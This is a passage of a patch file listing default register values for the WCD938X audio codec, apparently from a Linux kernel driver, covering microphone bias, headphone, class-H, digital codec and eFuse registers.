+-	{WCD938X_ANA_MICB2_RAMP,                               0x00},
+-	{WCD938X_ANA_MICB3,                                    0x10},
+-	{WCD938X_ANA_MICB4,                                    0x10},
+-	{WCD938X_BIAS_CTL,                                     0x2A},
+-	{WCD938X_BIAS_VBG_FINE_ADJ,                            0x55},
+-	{WCD938X_LDOL_VDDCX_ADJUST,                            0x01},
+-	{WCD938X_LDOL_DISABLE_LDOL,                            0x00},
+-	{WCD938X_MBHC_CTL_CLK,                                 0x00},
+-	{WCD938X_MBHC_CTL_ANA,                                 0x00},
+-	{WCD938X_MBHC_CTL_SPARE_1,                             0x00},
+-	{WCD938X_MBHC_CTL_SPARE_2,                             0x00},
+-	{WCD938X_MBHC_CTL_BCS,                                 0x00},
+-	{WCD938X_MBHC_MOISTURE_DET_FSM_STATUS,                 0x00},
+-	{WCD938X_MBHC_TEST_CTL,                                0x00},
+-	{WCD938X_LDOH_MODE,                                    0x2B},
+-	{WCD938X_LDOH_BIAS,                                    0x68},
+-	{WCD938X_LDOH_STB_LOADS,                               0x00},
+-	{WCD938X_LDOH_SLOWRAMP,                                0x50},
+-	{WCD938X_MICB1_TEST_CTL_1,                             0x1A},
+-	{WCD938X_MICB1_TEST_CTL_2,                             0x00},
+-	{WCD938X_MICB1_TEST_CTL_3,                             0xA4},
+-	{WCD938X_MICB2_TEST_CTL_1,                             0x1A},
+-	{WCD938X_MICB2_TEST_CTL_2,                             0x00},
+-	{WCD938X_MICB2_TEST_CTL_3,                             0x24},
+-	{WCD938X_MICB3_TEST_CTL_1,                             0x1A},
+-	{WCD938X_MICB3_TEST_CTL_2,                             0x00},
+-	{WCD938X_MICB3_TEST_CTL_3,                             0xA4},
+-	{WCD938X_MICB4_TEST_CTL_1,                             0x1A},
+-	{WCD938X_MICB4_TEST_CTL_2,                             0x00},
+-	{WCD938X_MICB4_TEST_CTL_3,                             0xA4},
+-	{WCD938X_TX_COM_ADC_VCM,                               0x39},
+-	{WCD938X_TX_COM_BIAS_ATEST,                            0xE0},
+-	{WCD938X_TX_COM_SPARE1,                                0x00},
+-	{WCD938X_TX_COM_SPARE2,                                0x00},
+-	{WCD938X_TX_COM_TXFE_DIV_CTL,                          0x22},
+-	{WCD938X_TX_COM_TXFE_DIV_START,                        0x00},
+-	{WCD938X_TX_COM_SPARE3,                                0x00},
+-	{WCD938X_TX_COM_SPARE4,                                0x00},
+-	{WCD938X_TX_1_2_TEST_EN,                               0xCC},
+-	{WCD938X_TX_1_2_ADC_IB,                                0xE9},
+-	{WCD938X_TX_1_2_ATEST_REFCTL,                          0x0A},
+-	{WCD938X_TX_1_2_TEST_CTL,                              0x38},
+-	{WCD938X_TX_1_2_TEST_BLK_EN1,                          0xFF},
+-	{WCD938X_TX_1_2_TXFE1_CLKDIV,                          0x00},
+-	{WCD938X_TX_1_2_SAR2_ERR,                              0x00},
+-	{WCD938X_TX_1_2_SAR1_ERR,                              0x00},
+-	{WCD938X_TX_3_4_TEST_EN,                               0xCC},
+-	{WCD938X_TX_3_4_ADC_IB,                                0xE9},
+-	{WCD938X_TX_3_4_ATEST_REFCTL,                          0x0A},
+-	{WCD938X_TX_3_4_TEST_CTL,                              0x38},
+-	{WCD938X_TX_3_4_TEST_BLK_EN3,                          0xFF},
+-	{WCD938X_TX_3_4_TXFE3_CLKDIV,                          0x00},
+-	{WCD938X_TX_3_4_SAR4_ERR,                              0x00},
+-	{WCD938X_TX_3_4_SAR3_ERR,                              0x00},
+-	{WCD938X_TX_3_4_TEST_BLK_EN2,                          0xFB},
+-	{WCD938X_TX_3_4_TXFE2_CLKDIV,                          0x00},
+-	{WCD938X_TX_3_4_SPARE1,                                0x00},
+-	{WCD938X_TX_3_4_TEST_BLK_EN4,                          0xFB},
+-	{WCD938X_TX_3_4_TXFE4_CLKDIV,                          0x00},
+-	{WCD938X_TX_3_4_SPARE2,                                0x00},
+-	{WCD938X_CLASSH_MODE_1,                                0x40},
+-	{WCD938X_CLASSH_MODE_2,                                0x3A},
+-	{WCD938X_CLASSH_MODE_3,                                0x00},
+-	{WCD938X_CLASSH_CTRL_VCL_1,                            0x70},
+-	{WCD938X_CLASSH_CTRL_VCL_2,                            0x82},
+-	{WCD938X_CLASSH_CTRL_CCL_1,                            0x31},
+-	{WCD938X_CLASSH_CTRL_CCL_2,                            0x80},
+-	{WCD938X_CLASSH_CTRL_CCL_3,                            0x80},
+-	{WCD938X_CLASSH_CTRL_CCL_4,                            0x51},
+-	{WCD938X_CLASSH_CTRL_CCL_5,                            0x00},
+-	{WCD938X_CLASSH_BUCK_TMUX_A_D,                         0x00},
+-	{WCD938X_CLASSH_BUCK_SW_DRV_CNTL,                      0x77},
+-	{WCD938X_CLASSH_SPARE,                                 0x00},
+-	{WCD938X_FLYBACK_EN,                                   0x4E},
+-	{WCD938X_FLYBACK_VNEG_CTRL_1,                          0x0B},
+-	{WCD938X_FLYBACK_VNEG_CTRL_2,                          0x45},
+-	{WCD938X_FLYBACK_VNEG_CTRL_3,                          0x74},
+-	{WCD938X_FLYBACK_VNEG_CTRL_4,                          0x7F},
+-	{WCD938X_FLYBACK_VNEG_CTRL_5,                          0x83},
+-	{WCD938X_FLYBACK_VNEG_CTRL_6,                          0x98},
+-	{WCD938X_FLYBACK_VNEG_CTRL_7,                          0xA9},
+-	{WCD938X_FLYBACK_VNEG_CTRL_8,                          0x68},
+-	{WCD938X_FLYBACK_VNEG_CTRL_9,                          0x64},
+-	{WCD938X_FLYBACK_VNEGDAC_CTRL_1,                       0xED},
+-	{WCD938X_FLYBACK_VNEGDAC_CTRL_2,                       0xF0},
+-	{WCD938X_FLYBACK_VNEGDAC_CTRL_3,                       0xA6},
+-	{WCD938X_FLYBACK_CTRL_1,                               0x65},
+-	{WCD938X_FLYBACK_TEST_CTL,                             0x00},
+-	{WCD938X_RX_AUX_SW_CTL,                                0x00},
+-	{WCD938X_RX_PA_AUX_IN_CONN,                            0x01},
+-	{WCD938X_RX_TIMER_DIV,                                 0x32},
+-	{WCD938X_RX_OCP_CTL,                                   0x1F},
+-	{WCD938X_RX_OCP_COUNT,                                 0x77},
+-	{WCD938X_RX_BIAS_EAR_DAC,                              0xA0},
+-	{WCD938X_RX_BIAS_EAR_AMP,                              0xAA},
+-	{WCD938X_RX_BIAS_HPH_LDO,                              0xA9},
+-	{WCD938X_RX_BIAS_HPH_PA,                               0xAA},
+-	{WCD938X_RX_BIAS_HPH_RDACBUFF_CNP2,                    0x8A},
+-	{WCD938X_RX_BIAS_HPH_RDAC_LDO,                         0x88},
+-	{WCD938X_RX_BIAS_HPH_CNP1,                             0x82},
+-	{WCD938X_RX_BIAS_HPH_LOWPOWER,                         0x82},
+-	{WCD938X_RX_BIAS_AUX_DAC,                              0xA0},
+-	{WCD938X_RX_BIAS_AUX_AMP,                              0xAA},
+-	{WCD938X_RX_BIAS_VNEGDAC_BLEEDER,                      0x50},
+-	{WCD938X_RX_BIAS_MISC,                                 0x00},
+-	{WCD938X_RX_BIAS_BUCK_RST,                             0x08},
+-	{WCD938X_RX_BIAS_BUCK_VREF_ERRAMP,                     0x44},
+-	{WCD938X_RX_BIAS_FLYB_ERRAMP,                          0x40},
+-	{WCD938X_RX_BIAS_FLYB_BUFF,                            0xAA},
+-	{WCD938X_RX_BIAS_FLYB_MID_RST,                         0x14},
+-	{WCD938X_HPH_L_STATUS,                                 0x04},
+-	{WCD938X_HPH_R_STATUS,                                 0x04},
+-	{WCD938X_HPH_CNP_EN,                                   0x80},
+-	{WCD938X_HPH_CNP_WG_CTL,                               0x9A},
+-	{WCD938X_HPH_CNP_WG_TIME,                              0x14},
+-	{WCD938X_HPH_OCP_CTL,                                  0x28},
+-	{WCD938X_HPH_AUTO_CHOP,                                0x16},
+-	{WCD938X_HPH_CHOP_CTL,                                 0x83},
+-	{WCD938X_HPH_PA_CTL1,                                  0x46},
+-	{WCD938X_HPH_PA_CTL2,                                  0x50},
+-	{WCD938X_HPH_L_EN,                                     0x80},
+-	{WCD938X_HPH_L_TEST,                                   0xE0},
+-	{WCD938X_HPH_L_ATEST,                                  0x50},
+-	{WCD938X_HPH_R_EN,                                     0x80},
+-	{WCD938X_HPH_R_TEST,                                   0xE0},
+-	{WCD938X_HPH_R_ATEST,                                  0x54},
+-	{WCD938X_HPH_RDAC_CLK_CTL1,                            0x99},
+-	{WCD938X_HPH_RDAC_CLK_CTL2,                            0x9B},
+-	{WCD938X_HPH_RDAC_LDO_CTL,                             0x33},
+-	{WCD938X_HPH_RDAC_CHOP_CLK_LP_CTL,                     0x00},
+-	{WCD938X_HPH_REFBUFF_UHQA_CTL,                         0x68},
+-	{WCD938X_HPH_REFBUFF_LP_CTL,                           0x0E},
+-	{WCD938X_HPH_L_DAC_CTL,                                0x20},
+-	{WCD938X_HPH_R_DAC_CTL,                                0x20},
+-	{WCD938X_HPH_SURGE_HPHLR_SURGE_COMP_SEL,               0x55},
+-	{WCD938X_HPH_SURGE_HPHLR_SURGE_EN,                     0x19},
+-	{WCD938X_HPH_SURGE_HPHLR_SURGE_MISC1,                  0xA0},
+-	{WCD938X_HPH_SURGE_HPHLR_SURGE_STATUS,                 0x00},
+-	{WCD938X_EAR_EAR_EN_REG,                               0x22},
+-	{WCD938X_EAR_EAR_PA_CON,                               0x44},
+-	{WCD938X_EAR_EAR_SP_CON,                               0xDB},
+-	{WCD938X_EAR_EAR_DAC_CON,                              0x80},
+-	{WCD938X_EAR_EAR_CNP_FSM_CON,                          0xB2},
+-	{WCD938X_EAR_TEST_CTL,                                 0x00},
+-	{WCD938X_EAR_STATUS_REG_1,                             0x00},
+-	{WCD938X_EAR_STATUS_REG_2,                             0x08},
+-	{WCD938X_ANA_NEW_PAGE_REGISTER,                        0x00},
+-	{WCD938X_HPH_NEW_ANA_HPH2,                             0x00},
+-	{WCD938X_HPH_NEW_ANA_HPH3,                             0x00},
+-	{WCD938X_SLEEP_CTL,                                    0x16},
+-	{WCD938X_SLEEP_WATCHDOG_CTL,                           0x00},
+-	{WCD938X_MBHC_NEW_ELECT_REM_CLAMP_CTL,                 0x00},
+-	{WCD938X_MBHC_NEW_CTL_1,                               0x02},
+-	{WCD938X_MBHC_NEW_CTL_2,                               0x05},
+-	{WCD938X_MBHC_NEW_PLUG_DETECT_CTL,                     0xE9},
+-	{WCD938X_MBHC_NEW_ZDET_ANA_CTL,                        0x0F},
+-	{WCD938X_MBHC_NEW_ZDET_RAMP_CTL,                       0x00},
+-	{WCD938X_MBHC_NEW_FSM_STATUS,                          0x00},
+-	{WCD938X_MBHC_NEW_ADC_RESULT,                          0x00},
+-	{WCD938X_TX_NEW_AMIC_MUX_CFG,                          0x00},
+-	{WCD938X_AUX_AUXPA,                                    0x00},
+-	{WCD938X_LDORXTX_MODE,                                 0x0C},
+-	{WCD938X_LDORXTX_CONFIG,                               0x10},
+-	{WCD938X_DIE_CRACK_DIE_CRK_DET_EN,                     0x00},
+-	{WCD938X_DIE_CRACK_DIE_CRK_DET_OUT,                    0x00},
+-	{WCD938X_HPH_NEW_INT_RDAC_GAIN_CTL,                    0x40},
+-	{WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_L,                   0x81},
+-	{WCD938X_HPH_NEW_INT_RDAC_VREF_CTL,                    0x10},
+-	{WCD938X_HPH_NEW_INT_RDAC_OVERRIDE_CTL,                0x00},
+-	{WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_R,                   0x81},
+-	{WCD938X_HPH_NEW_INT_PA_MISC1,                         0x22},
+-	{WCD938X_HPH_NEW_INT_PA_MISC2,                         0x00},
+-	{WCD938X_HPH_NEW_INT_PA_RDAC_MISC,                     0x00},
+-	{WCD938X_HPH_NEW_INT_HPH_TIMER1,                       0xFE},
+-	{WCD938X_HPH_NEW_INT_HPH_TIMER2,                       0x02},
+-	{WCD938X_HPH_NEW_INT_HPH_TIMER3,                       0x4E},
+-	{WCD938X_HPH_NEW_INT_HPH_TIMER4,                       0x54},
+-	{WCD938X_HPH_NEW_INT_PA_RDAC_MISC2,                    0x00},
+-	{WCD938X_HPH_NEW_INT_PA_RDAC_MISC3,                    0x00},
+-	{WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_L_NEW,               0x90},
+-	{WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_R_NEW,               0x90},
+-	{WCD938X_RX_NEW_INT_HPH_RDAC_BIAS_LOHIFI,              0x62},
+-	{WCD938X_RX_NEW_INT_HPH_RDAC_BIAS_ULP,                 0x01},
+-	{WCD938X_RX_NEW_INT_HPH_RDAC_LDO_LP,                   0x11},
+-	{WCD938X_MBHC_NEW_INT_MOISTURE_DET_DC_CTRL,            0x57},
+-	{WCD938X_MBHC_NEW_INT_MOISTURE_DET_POLLING_CTRL,       0x01},
+-	{WCD938X_MBHC_NEW_INT_MECH_DET_CURRENT,                0x00},
+-	{WCD938X_MBHC_NEW_INT_SPARE_2,                         0x00},
+-	{WCD938X_EAR_INT_NEW_EAR_CHOPPER_CON,                  0xA8},
+-	{WCD938X_EAR_INT_NEW_CNP_VCM_CON1,                     0x42},
+-	{WCD938X_EAR_INT_NEW_CNP_VCM_CON2,                     0x22},
+-	{WCD938X_EAR_INT_NEW_EAR_DYNAMIC_BIAS,                 0x00},
+-	{WCD938X_AUX_INT_EN_REG,                               0x00},
+-	{WCD938X_AUX_INT_PA_CTRL,                              0x06},
+-	{WCD938X_AUX_INT_SP_CTRL,                              0xD2},
+-	{WCD938X_AUX_INT_DAC_CTRL,                             0x80},
+-	{WCD938X_AUX_INT_CLK_CTRL,                             0x50},
+-	{WCD938X_AUX_INT_TEST_CTRL,                            0x00},
+-	{WCD938X_AUX_INT_STATUS_REG,                           0x00},
+-	{WCD938X_AUX_INT_MISC,                                 0x00},
+-	{WCD938X_LDORXTX_INT_BIAS,                             0x6E},
+-	{WCD938X_LDORXTX_INT_STB_LOADS_DTEST,                  0x50},
+-	{WCD938X_LDORXTX_INT_TEST0,                            0x1C},
+-	{WCD938X_LDORXTX_INT_STARTUP_TIMER,                    0xFF},
+-	{WCD938X_LDORXTX_INT_TEST1,                            0x1F},
+-	{WCD938X_LDORXTX_INT_STATUS,                           0x00},
+-	{WCD938X_SLEEP_INT_WATCHDOG_CTL_1,                     0x0A},
+-	{WCD938X_SLEEP_INT_WATCHDOG_CTL_2,                     0x0A},
+-	{WCD938X_DIE_CRACK_INT_DIE_CRK_DET_INT1,               0x02},
+-	{WCD938X_DIE_CRACK_INT_DIE_CRK_DET_INT2,               0x60},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L2,               0xFF},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L1,               0x7F},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L0,               0x3F},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_ULP1P2M,          0x1F},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_ULP0P6M,          0x0F},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_L2L1,          0xD7},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_L0,            0xC8},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_ULP,           0xC6},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_L2L1,      0xD5},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_L0,        0xCA},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_ULP,       0x05},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2CASC_L2L1L0,    0xA5},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2CASC_ULP,       0x13},
+-	{WCD938X_TX_COM_NEW_INT_TXADC_SCBIAS_L2L1,             0x88},
+-	{WCD938X_TX_COM_NEW_INT_TXADC_SCBIAS_L0ULP,            0x42},
+-	{WCD938X_TX_COM_NEW_INT_TXADC_INT_L2,                  0xFF},
+-	{WCD938X_TX_COM_NEW_INT_TXADC_INT_L1,                  0x64},
+-	{WCD938X_TX_COM_NEW_INT_TXADC_INT_L0,                  0x64},
+-	{WCD938X_TX_COM_NEW_INT_TXADC_INT_ULP,                 0x77},
+-	{WCD938X_DIGITAL_PAGE_REGISTER,                        0x00},
+-	{WCD938X_DIGITAL_CHIP_ID0,                             0x00},
+-	{WCD938X_DIGITAL_CHIP_ID1,                             0x00},
+-	{WCD938X_DIGITAL_CHIP_ID2,                             0x0D},
+-	{WCD938X_DIGITAL_CHIP_ID3,                             0x01},
+-	{WCD938X_DIGITAL_SWR_TX_CLK_RATE,                      0x00},
+-	{WCD938X_DIGITAL_CDC_RST_CTL,                          0x03},
+-	{WCD938X_DIGITAL_TOP_CLK_CFG,                          0x00},
+-	{WCD938X_DIGITAL_CDC_ANA_CLK_CTL,                      0x00},
+-	{WCD938X_DIGITAL_CDC_DIG_CLK_CTL,                      0xF0},
+-	{WCD938X_DIGITAL_SWR_RST_EN,                           0x00},
+-	{WCD938X_DIGITAL_CDC_PATH_MODE,                        0x55},
+-	{WCD938X_DIGITAL_CDC_RX_RST,                           0x00},
+-	{WCD938X_DIGITAL_CDC_RX0_CTL,                          0xFC},
+-	{WCD938X_DIGITAL_CDC_RX1_CTL,                          0xFC},
+-	{WCD938X_DIGITAL_CDC_RX2_CTL,                          0xFC},
+-	{WCD938X_DIGITAL_CDC_TX_ANA_MODE_0_1,                  0x00},
+-	{WCD938X_DIGITAL_CDC_TX_ANA_MODE_2_3,                  0x00},
+-	{WCD938X_DIGITAL_CDC_COMP_CTL_0,                       0x00},
+-	{WCD938X_DIGITAL_CDC_ANA_TX_CLK_CTL,                   0x1E},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A1_0,                     0x00},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A1_1,                     0x01},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A2_0,                     0x63},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A2_1,                     0x04},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A3_0,                     0xAC},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A3_1,                     0x04},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A4_0,                     0x1A},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A4_1,                     0x03},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A5_0,                     0xBC},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A5_1,                     0x02},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A6_0,                     0xC7},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A7_0,                     0xF8},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_C_0,                      0x47},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_C_1,                      0x43},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_C_2,                      0xB1},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_C_3,                      0x17},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_R1,                       0x4D},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_R2,                       0x29},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_R3,                       0x34},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_R4,                       0x59},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_R5,                       0x66},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_R6,                       0x87},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_R7,                       0x64},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A1_0,                     0x00},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A1_1,                     0x01},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A2_0,                     0x96},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A2_1,                     0x09},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A3_0,                     0xAB},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A3_1,                     0x05},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A4_0,                     0x1C},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A4_1,                     0x02},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A5_0,                     0x17},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A5_1,                     0x02},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A6_0,                     0xAA},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A7_0,                     0xE3},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_C_0,                      0x69},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_C_1,                      0x54},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_C_2,                      0x02},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_C_3,                      0x15},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_R1,                       0xA4},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_R2,                       0xB5},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_R3,                       0x86},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_R4,                       0x85},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_R5,                       0xAA},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_R6,                       0xE2},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_R7,                       0x62},
+-	{WCD938X_DIGITAL_CDC_HPH_GAIN_RX_0,                    0x55},
+-	{WCD938X_DIGITAL_CDC_HPH_GAIN_RX_1,                    0xA9},
+-	{WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_0,                   0x3D},
+-	{WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_1,                   0x2E},
+-	{WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_2,                   0x01},
+-	{WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_0,                   0x00},
+-	{WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_1,                   0xFC},
+-	{WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_2,                   0x01},
+-	{WCD938X_DIGITAL_CDC_HPH_GAIN_CTL,                     0x00},
+-	{WCD938X_DIGITAL_CDC_AUX_GAIN_CTL,                     0x00},
+-	{WCD938X_DIGITAL_CDC_EAR_PATH_CTL,                     0x00},
+-	{WCD938X_DIGITAL_CDC_SWR_CLH,                          0x00},
+-	{WCD938X_DIGITAL_SWR_CLH_BYP,                          0x00},
+-	{WCD938X_DIGITAL_CDC_TX0_CTL,                          0x68},
+-	{WCD938X_DIGITAL_CDC_TX1_CTL,                          0x68},
+-	{WCD938X_DIGITAL_CDC_TX2_CTL,                          0x68},
+-	{WCD938X_DIGITAL_CDC_TX_RST,                           0x00},
+-	{WCD938X_DIGITAL_CDC_REQ_CTL,                          0x01},
+-	{WCD938X_DIGITAL_CDC_RST,                              0x00},
+-	{WCD938X_DIGITAL_CDC_AMIC_CTL,                         0x0F},
+-	{WCD938X_DIGITAL_CDC_DMIC_CTL,                         0x04},
+-	{WCD938X_DIGITAL_CDC_DMIC1_CTL,                        0x01},
+-	{WCD938X_DIGITAL_CDC_DMIC2_CTL,                        0x01},
+-	{WCD938X_DIGITAL_CDC_DMIC3_CTL,                        0x01},
+-	{WCD938X_DIGITAL_CDC_DMIC4_CTL,                        0x01},
+-	{WCD938X_DIGITAL_EFUSE_PRG_CTL,                        0x00},
+-	{WCD938X_DIGITAL_EFUSE_CTL,                            0x2B},
+-	{WCD938X_DIGITAL_CDC_DMIC_RATE_1_2,                    0x11},
+-	{WCD938X_DIGITAL_CDC_DMIC_RATE_3_4,                    0x11},
+-	{WCD938X_DIGITAL_PDM_WD_CTL0,                          0x00},
+-	{WCD938X_DIGITAL_PDM_WD_CTL1,                          0x00},
+-	{WCD938X_DIGITAL_PDM_WD_CTL2,                          0x00},
+-	{WCD938X_DIGITAL_INTR_MODE,                            0x00},
+-	{WCD938X_DIGITAL_INTR_MASK_0,                          0xFF},
+-	{WCD938X_DIGITAL_INTR_MASK_1,                          0xFF},
+-	{WCD938X_DIGITAL_INTR_MASK_2,                          0x3F},
+-	{WCD938X_DIGITAL_INTR_STATUS_0,                        0x00},
+-	{WCD938X_DIGITAL_INTR_STATUS_1,                        0x00},
+-	{WCD938X_DIGITAL_INTR_STATUS_2,                        0x00},
+-	{WCD938X_DIGITAL_INTR_CLEAR_0,                         0x00},
+-	{WCD938X_DIGITAL_INTR_CLEAR_1,                         0x00},
+-	{WCD938X_DIGITAL_INTR_CLEAR_2,                         0x00},
+-	{WCD938X_DIGITAL_INTR_LEVEL_0,                         0x00},
+-	{WCD938X_DIGITAL_INTR_LEVEL_1,                         0x00},
+-	{WCD938X_DIGITAL_INTR_LEVEL_2,                         0x00},
+-	{WCD938X_DIGITAL_INTR_SET_0,                           0x00},
+-	{WCD938X_DIGITAL_INTR_SET_1,                           0x00},
+-	{WCD938X_DIGITAL_INTR_SET_2,                           0x00},
+-	{WCD938X_DIGITAL_INTR_TEST_0,                          0x00},
+-	{WCD938X_DIGITAL_INTR_TEST_1,                          0x00},
+-	{WCD938X_DIGITAL_INTR_TEST_2,                          0x00},
+-	{WCD938X_DIGITAL_TX_MODE_DBG_EN,                       0x00},
+-	{WCD938X_DIGITAL_TX_MODE_DBG_0_1,                      0x00},
+-	{WCD938X_DIGITAL_TX_MODE_DBG_2_3,                      0x00},
+-	{WCD938X_DIGITAL_LB_IN_SEL_CTL,                        0x00},
+-	{WCD938X_DIGITAL_LOOP_BACK_MODE,                       0x00},
+-	{WCD938X_DIGITAL_SWR_DAC_TEST,                         0x00},
+-	{WCD938X_DIGITAL_SWR_HM_TEST_RX_0,                     0x40},
+-	{WCD938X_DIGITAL_SWR_HM_TEST_TX_0,                     0x40},
+-	{WCD938X_DIGITAL_SWR_HM_TEST_RX_1,                     0x00},
+-	{WCD938X_DIGITAL_SWR_HM_TEST_TX_1,                     0x00},
+-	{WCD938X_DIGITAL_SWR_HM_TEST_TX_2,                     0x00},
+-	{WCD938X_DIGITAL_SWR_HM_TEST_0,                        0x00},
+-	{WCD938X_DIGITAL_SWR_HM_TEST_1,                        0x00},
+-	{WCD938X_DIGITAL_PAD_CTL_SWR_0,                        0x8F},
+-	{WCD938X_DIGITAL_PAD_CTL_SWR_1,                        0x06},
+-	{WCD938X_DIGITAL_I2C_CTL,                              0x00},
+-	{WCD938X_DIGITAL_CDC_TX_TANGGU_SW_MODE,                0x00},
+-	{WCD938X_DIGITAL_EFUSE_TEST_CTL_0,                     0x00},
+-	{WCD938X_DIGITAL_EFUSE_TEST_CTL_1,                     0x00},
+-	{WCD938X_DIGITAL_EFUSE_T_DATA_0,                       0x00},
+-	{WCD938X_DIGITAL_EFUSE_T_DATA_1,                       0x00},
+-	{WCD938X_DIGITAL_PAD_CTL_PDM_RX0,                      0xF1},
+-	{WCD938X_DIGITAL_PAD_CTL_PDM_RX1,                      0xF1},
+-	{WCD938X_DIGITAL_PAD_CTL_PDM_TX0,                      0xF1},
+-	{WCD938X_DIGITAL_PAD_CTL_PDM_TX1,                      0xF1},
+-	{WCD938X_DIGITAL_PAD_CTL_PDM_TX2,                      0xF1},
+-	{WCD938X_DIGITAL_PAD_INP_DIS_0,                        0x00},
+-	{WCD938X_DIGITAL_PAD_INP_DIS_1,                        0x00},
+-	{WCD938X_DIGITAL_DRIVE_STRENGTH_0,                     0x00},
+-	{WCD938X_DIGITAL_DRIVE_STRENGTH_1,                     0x00},
+-	{WCD938X_DIGITAL_DRIVE_STRENGTH_2,                     0x00},
+-	{WCD938X_DIGITAL_RX_DATA_EDGE_CTL,                     0x1F},
+-	{WCD938X_DIGITAL_TX_DATA_EDGE_CTL,                     0x80},
+-	{WCD938X_DIGITAL_GPIO_MODE,                            0x00},
+-	{WCD938X_DIGITAL_PIN_CTL_OE,                           0x00},
+-	{WCD938X_DIGITAL_PIN_CTL_DATA_0,                       0x00},
+-	{WCD938X_DIGITAL_PIN_CTL_DATA_1,                       0x00},
+-	{WCD938X_DIGITAL_PIN_STATUS_0,                         0x00},
+-	{WCD938X_DIGITAL_PIN_STATUS_1,                         0x00},
+-	{WCD938X_DIGITAL_DIG_DEBUG_CTL,                        0x00},
+-	{WCD938X_DIGITAL_DIG_DEBUG_EN,                         0x00},
+-	{WCD938X_DIGITAL_ANA_CSR_DBG_ADD,                      0x00},
+-	{WCD938X_DIGITAL_ANA_CSR_DBG_CTL,                      0x48},
+-	{WCD938X_DIGITAL_SSP_DBG,                              0x00},
+-	{WCD938X_DIGITAL_MODE_STATUS_0,                        0x00},
+-	{WCD938X_DIGITAL_MODE_STATUS_1,                        0x00},
+-	{WCD938X_DIGITAL_SPARE_0,                              0x00},
+-	{WCD938X_DIGITAL_SPARE_1,                              0x00},
+-	{WCD938X_DIGITAL_SPARE_2,                              0x00},
+-	{WCD938X_DIGITAL_EFUSE_REG_0,                          0x00},
+-	{WCD938X_DIGITAL_EFUSE_REG_1,                          0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_2,                          0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_3,                          0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_4,                          0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_5,                          0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_6,                          0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_7,                          0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_8,                          0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_9,                          0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_10,                         0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_11,                         0xFF},
